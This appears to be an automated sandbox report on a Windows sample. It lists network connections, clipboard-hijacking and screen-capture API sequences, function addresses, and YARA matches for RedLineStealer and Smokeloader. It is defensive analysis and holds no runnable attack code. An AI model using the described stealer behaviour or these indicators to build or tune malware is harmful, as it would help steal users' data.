        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.9:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49776 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49784 version: TLS 1.2
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02131942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02131942
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,3_2_00436980

        System Summary

        barindex
        Source: 0.2.Mmm7GmDcR4.exe.5609cc.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000003.00000002.1674950498.0000000000760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000003.00000002.1674790752.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.3770031470.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02132357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02132357
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021325FB NtdllDefWindowProc_W,PostQuitMessage,0_2_021325FB
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004280120_2_00428012
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004071A10_2_004071A1
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004373C90_2_004373C9
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004274740_2_00427474
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0042D4DE0_2_0042D4DE
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004285500_2_00428550
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0043D6680_2_0043D668
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0041669F0_2_0041669F
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004137150_2_00413715
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_004277E60_2_004277E6
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0040E96A0_2_0040E96A
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0042EAD00_2_0042EAD0
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00427A900_2_00427A90
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00418A9F0_2_00418A9F
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00436CAF0_2_00436CAF
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00427D570_2_00427D57
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_00413EFB0_2_00413EFB
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021582790_2_02158279
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0215ED370_2_0215ED37
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021441620_2_02144162
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021576DB0_2_021576DB
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0215D7450_2_0215D745
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021587B70_2_021587B7
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02157A4D0_2_02157A4D
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0213EBD10_2_0213EBD1
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_021469060_2_02146906
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0214397C0_2_0214397C
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02166F160_2_02166F16
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02157FBE0_2_02157FBE
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02157CF70_2_02157CF7
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_02148D060_2_02148D06
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: 0_2_0215ED370_2_0215ED37
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043B8703_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004088803_2_00408880
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040CA623_2_0040CA62
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00421E703_2_00421E70
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004157203_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040CFEC3_2_0040CFEC
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004198403_2_00419840
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004068503_2_00406850
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004278603_2_00427860
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004270703_2_00427070
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004060003_2_00406000
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043080E3_2_0043080E
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043F8203_2_0043F820
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041D0C03_2_0041D0C0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004418A03_2_004418A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041194F3_2_0041194F
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043F1503_2_0043F150
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042B1703_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004039003_2_00403900
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004251003_2_00425100
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004399233_2_00439923
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004271333_2_00427133
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004339303_2_00433930
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004121DB3_2_004121DB
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042A9F73_2_0042A9F7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040E9B03_2_0040E9B0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041825B3_2_0041825B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042EA623_2_0042EA62
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00442A603_2_00442A60
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041DAD03_2_0041DAD0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00429ADE3_2_00429ADE
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00425AF03_2_00425AF0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004092A03_2_004092A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00405AB03_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040B2B03_2_0040B2B0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004042B03_2_004042B0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043CB403_2_0043CB40
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042EB5F3_2_0042EB5F
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004083603_2_00408360
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00428B673_2_00428B67
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00437B693_2_00437B69
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00402B203_2_00402B20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00441B203_2_00441B20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00432B243_2_00432B24
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004063C03_2_004063C0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042DBF03_2_0042DBF0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004223803_2_00422380
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041BBA03_2_0041BBA0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042BBA03_2_0042BBA0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042EBA13_2_0042EBA1
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042EBB33_2_0042EBB3
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00441BB03_2_00441BB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00441C403_2_00441C40
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004424703_2_00442470
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00426C763_2_00426C76
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041D4003_2_0041D400
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041C4003_2_0041C400
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004174053_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00414C203_2_00414C20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004324263_2_00432426
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004284373_2_00428437
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043443D3_2_0043443D
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004354C43_2_004354C4
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00434CEF3_2_00434CEF
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043A4EF3_2_0043A4EF
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004374AB3_2_004374AB
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041DCB03_2_0041DCB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043ACB03_2_0043ACB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0042FCBC3_2_0042FCBC
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040D5453_2_0040D545
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00425D6A3_2_00425D6A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00435D133_2_00435D13
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00442D203_2_00442D20
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043CD273_2_0043CD27
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00420D903_2_00420D90
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0043C5A03_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004366103_2_00436610
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004076203_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040AE303_2_0040AE30
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041F6D03_2_0041F6D0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00416ED03_2_00416ED0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041BEE13_2_0041BEE1
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00402EF03_2_00402EF0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004186FC3_2_004186FC
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00423EFF3_2_00423EFF
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00431E8E3_2_00431E8E
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041A6903_2_0041A690
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0041AF243_2_0041AF24
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00427F303_2_00427F30
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0040DFE23_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004257E03_2_004257E0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00429FE43_2_00429FE4
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004097903_2_00409790
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_004427B03_2_004427B0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00441FB03_2_00441FB0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007A20173_2_007A2017
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007920F53_2_007920F5
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007820D73_2_007820D7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007860B73_2_007860B7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076B0973_2_0076B097
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007841663_2_00784166
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007631573_2_00763157
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077C1483_2_0077C148
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007881973_2_00788197
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077B18B3_2_0077B18B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007662673_2_00766267
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076D2533_2_0076D253
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076E2493_2_0076E249
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077D3273_2_0077D327
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078A3053_2_0078A305
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007873B23_2_007873B2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079F3B73_2_0079F3B7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007724423_2_00772442
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007784C23_2_007784C2
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007645173_2_00764517
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007695073_2_00769507
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007825E73_2_007825E7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007685C73_2_007685C7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077C6673_2_0077C667
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077D6673_2_0077D667
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007666273_2_00766627
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007A26D73_2_007A26D7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007946A43_2_007946A4
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079268D3_2_0079268D
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079A7563_2_0079A756
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079572B3_2_0079572B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007977123_2_00797712
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076D7AC3_2_0076D7AC
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007968773_2_00796877
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079C8073_2_0079C807
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077A8F73_2_0077A8F7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007678873_2_00767887
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077F9373_2_0077F937
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007699F73_2_007699F7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00790A753_2_00790A75
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007A2A173_2_007A2A17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00768AE73_2_00768AE7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00777AE43_2_00777AE4
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079BAD73_2_0079BAD7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00766AB73_2_00766AB7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00779AA73_2_00779AA7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079FA873_2_0079FA87
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00763B673_2_00763B67
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00771BB63_2_00771BB6
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00793B973_2_00793B97
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00799B8A3_2_00799B8A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076EC173_2_0076EC17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078ECC93_2_0078ECC9
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007A2CC73_2_007A2CC7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0076CCC93_2_0076CCC9
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077DD373_2_0077DD37
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00765D173_2_00765D17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00797DD03_2_00797DD0
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078EDC63_2_0078EDC6
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079CDA73_2_0079CDA7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00762D873_2_00762D87
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00792D8B3_2_00792D8B
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078DE573_2_0078DE57
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078EE1A3_2_0078EE1A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078EE083_2_0078EE08
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078BE073_2_0078BE07
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00774E873_2_00774E87
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00795F7A3_2_00795F7A
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00794F563_2_00794F56
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0078FF233_2_0078FF23
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0077DF173_2_0077DF17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_0079AF173_2_0079AF17
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00777FFA3_2_00777FFA
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_00780FF73_2_00780FF7
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: 3_2_007A2F873_2_007A2F87
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: String function: 02140977 appears 53 times
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: String function: 00410710 appears 53 times
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: String function: 0214000F appears 121 times
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: String function: 0040FDA8 appears 125 times
        Source: C:\Users\user\Desktop\Mmm7GmDcR4.exeCode function: String function: 0040F8F9 appears 36 times
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: String function: 00414C10 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: String function: 00774E77 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: String function: 00408170 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeCode function: String function: 007683D7 appears 77 times
        Source: C:\Users\user\AppData\Local\Temp\3B5A.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 1792
        Source: Mmm7GmDcR4.exeBinary or memory string: OriginalFileName vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exe, 00000000.00000000.1325605365.000000000045A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOrehinal4 vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exe, 00000000.00000003.1368189193.00000000033D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOrehinal4 vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exe, 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exe, 00000000.00000003.1333447743.00000000021A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exeBinary or memory string: OriginalFilenamesOrehinal4 vs Mmm7GmDcR4.exe
        Source: Mmm7GmDcR4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
